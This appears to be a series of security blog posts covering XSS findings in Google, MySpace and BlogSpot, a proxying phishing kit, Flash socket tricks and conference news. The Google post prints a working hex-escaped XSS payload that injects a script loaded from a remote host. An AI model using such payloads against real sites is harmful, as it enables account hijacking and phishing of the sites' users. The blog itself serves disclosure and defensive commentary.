I know I haven’t done many SEO posts lately, but one of my co-workers is leaving (who specializes in SEO) and I thought I’d pay him a little tribute. I spent a few minutes throwing up another tool into my vulnerability lab that detects the SEO Firefox plugin - Search Status. In particular it helps detect if they are attempting to find rel=nofollow put on links. That’s important for SEO folks because they know which pages will give them higher page rank if they put a link on the page.

Search Status has a function to enable highlighting of nofollow tags, which is highly useful for improving page rank (knowing where and where not to post if you are interested in backlinks on web-boards for instance). This will help ferret out those pesky SEO experts and either deliver them different content or change the links to remove the rel=nofollow modifications so they aren’t visible. A cute trick based off of Jeremiah’s CSS hack (which I also put back up online in the lab).

At 12:57 this morning Hong posted a working exploit in Google based on some work he did on the 13th, finding another XSS vulnerability in Google. This one is a little more interesting than most, because it uses a basic mis-understanding of what can be done with document.write. Google’s engineers were smart enough to close off the obvious quotes and angle brackets, but because they are inside a document.write you can use escape chars to build text that represents the output in question. Here is an example PoC:

\x22\x3e\x3c\x2fiframe\x3e\x3cscript\x20src\x3dhttp\x3a\x2f\x2fha.ckers.org\x2fxss.js\x3e\x3c\x2fscript\x3e

As you can see, the \x represents a hex character. So basically pretend that you are going to URL encode something and then do a replace. Anytime you see “%” replace it with “\x”. In this way no angle brackets, no quotes, equals signs or any other character other than a backslash and alpha numerics are required for the vector to fire. Pretty tricky stuff, especially since most people don’t understand what can be done inside a document.write, including Google’s developers. Nice find, Hong and nice demonstration of what is possible inside a document.write. Time to protect yourself from backslashes too, I’d say.

This is a really upsetting story about how a teenager was infected by a trojan, used as a fileserver for child pornography, and then attempted to be prosecuted as a sex offender. The sex offender charge was based off of a plea charge after admitting to showing other teenaged boys a playboy magazine. The circumstances are so ridiculous it’s just painful to read. The jist is the boy went to visit a porn site that infected his computer, and then the police detected the computer uploading child pornography.

I was asked after being sent this if having a firewall and anti-virus is enough to protect your computer. Unfortunately the answer is no. Let’s think about session riding for a second. It is trivial to get any user to download images from any website that doesn’t protect itself with a simple IMG tag. In this way a user can visit an otherwise benign site, and be forced to download child pornography or perform attacks on servers or whatever the attacker wants by proxy. Very scary.

This is just painful to write this. Again today, digi7al64 found another non-alpha-non-digit XSS hole in MySpace. This is number 6, folks. SIX times MySpace has failed to fix this issue. I will admit, they did make it harder, from what I can tell, as of yesterday a lot more filters were put in place that appeared to fix the issue, but alas, they still haven’t taken the single point of advice that will set them free… use a while loop! Maybe I should clarify, I don’t mean use it sometimes, I mean use it whenever you strip. And even then I don’t recommend stripping at all, but if you have to you absolutely must use a while loop.

I’m not even going to bother trying to write out digi7al64’s XSS vector, you can click the link above to see it yourself, but the jist is that they strip out xsrc=… in certain contexts, and then don’t iterate over the text again to insure that the data they stripped didn’t cause another vector to surface. If it isn’t clear to anyone yet, here’s the basic idea of this issue. Let’s say the word “TED” is bad. We hate TED today. Now, let’s say I put the word TETEDD. The text looks like this TE[stripped]D after stripping, which then re-creates the word we were trying to stop in the first place.

MySpace continues to have this problem over and over because they don’t loop over the text to try to find the same strings they were initially trying to block again. If they did they would find the malicious string and strip it again (then iterate again and so on). Painful.

Thanks to Mark for sending this over, but there is a new phishing kit that acts as a man in the middle. According to the article the phishing kit simply acts as a PHP proxy to forward any requests directly through the proxy. That way it can detect anything you are typing or defeat any systems like sitekey that require that you see the image in question.

I can’t exactly say this is a major leap forward, because I’ve seen phishing sites that have similar levels of sophistication in automatic detection of whether the username/password was correct by checking in real time. However, this does represent a new variant that could render a lot of the more snake oil security products virtually useless. The one major disadvantage with this system is that it has to reside on a host and if the same IP is used over and over and over, that could set off a lot of alarms. Interesting nonetheless.

Today another thread started on sla.ckers.org discussing how Google has continued to index working XSS exploits. This might not sound like news because I’ve discussed it before. This time it’s different. eyeced pointed out that this time Google has indexed not just any XSS but XSS in FBI’s website.

Last time Cory from Google said, flippantly "Is XSS not part of “all the world’s information?” ;)" and to that I responded, “if that were the case, then you’d bring back all the currently disabled Google dorks, no?” (He did not respond - big surprise).

I would expect this to vanish quickly, but the point is the same. If someone can search for an XSS exploit so easily, or be inadvertently taken to a valid looking URL that actually performs an XSS attack, that makes Google’s search results far more dangerous to consumers. They cannot trust that the page they are visiting will be benign, even if it is on a trustworthy domain (like FBI.gov). If the exploit had been loaded with a keyword that someone not looking for an attack vector might have searched for this could be easily used to phish, steal credentials or worse in a very believable way. Ouch.

Kanatoko published yet another way to do Anti-DNS pinning and port scanning using Flash and potentially Java as well. This is scary for two reasons. First, the anti-DNS pinning trick (the obvious one) and second is the fact that Flash can now read raw sockets. This means Flash just got a lot more powerful. It can read any binary output and interact with it. Does anyone else think this is as scary as I do?

There is a writeup at Adobe’s site on the 9.x socket functionality of the Flash player. I haven’t heard about anyone exploiting this until today (nor have I ever heard about the socket functionality until now, either). But I am guessing this will spark a new wave of security holes now that you have read access to the ports that the user’s browser has access (the most interesting of which are on the Intranet). But this also paves the way for a lot more interesting IP security related hacks. Crazy times, and nice work, Kanatoko!

I got an email today from Jose Avila about an XSS hole in BlogSpot. For anyone who doesn’t know, Blogspot is a free blogging system for people who can’t or don’t want to host their own. Anyway, his blog post discusses how the exploit works. Essentially Blogspot considers anything inside of comment tags to be safe. So he encapsulates his vector which closes the title tag and starts a remote script include inside of comment tags.

The demo PoC page is located here and works only in Safari (and possibly Konquorer although that is unverified) as Internet Explorer and Firefox treat an end title tag inside of a comment tag as part of the title instead of ending the title. Weird, huh? The vector is the truly noteworthy part of this, even though the site itself is very popular. Anything inside of comment tags, even if that includes an end title tag is treated as a title. Bizzare behavior, but proves that you can’t assume that things inside of comment tags are okay (as the downlevel hidden XSS vector showed us as well). Nice find, Jose!

Whelp, it’s that time of year again. Time for vendors to show us what they are made of, and for us to punch holes in everything they worked on all year. No, but seriously, I try to make it a point to get to every RSACon I can. Vendors have a lot of interesting things to say, even if I tend to find lots of issues. Also the people walking the floor incognito tend to be pretty interesting security folk. Not to mention the real reason I want to go, which is the WASC (web application security consortium) meetup:

Place: Jillian’s (Walking distance from the conference) 101 4th Street, Suite 170 San Francisco, CA 94103 Phone: 415.369.6100. Time: Wed, Feb. 7 @ 12:30pm. I’m actually only going for one day (that day) just for the meet and greet. Yup, it’s worth it.

If you’ve never gone to a WASC meetup think of it as the Web application luncheon meet and greet. Unlike the OWASP meetings there’s not a lot of tech-talk, but usually 20 or so good people and you get to meet the people behind the names face to face. If you happen to be at RSACon on Wednesday, check it out. Let Jeremiah know if you plan on making it, so he can make the right sized reservations. If you can’t, don’t worry, I’ll probably blog about it when I get back.

I’m not a huge fan of virtualization in production environments (feels an awful lot like putting all your eggs in one basket and slowing everything down in the process) but you cannot beat it for testing. Today I found out that VMWare server is now free for download. Their major upsell is service contracts and add-ons, but if you don’t tend to use that or need it for testing and you run Windows but want to run other operating systems or perform potentially dangerous tests, this is the software for you.

If you’ve never played with VMWare before you’re missing out. You can read from a bootable ISO or you can compile your own OS into what is essentially a large file that represents the computer’s disc. That computer can be copied too. So if you want to run a dangerous test, you copy the file, boot it, install your dangerous software, run it, perform your tests, then shut it down and delete it without worry since it never touched your real drive or your original image. Perfect! If you’ve got an extra copy of a distro lying around that you never got to play with and didn’t feel like repartitioning a drive, this is definitely the software for you.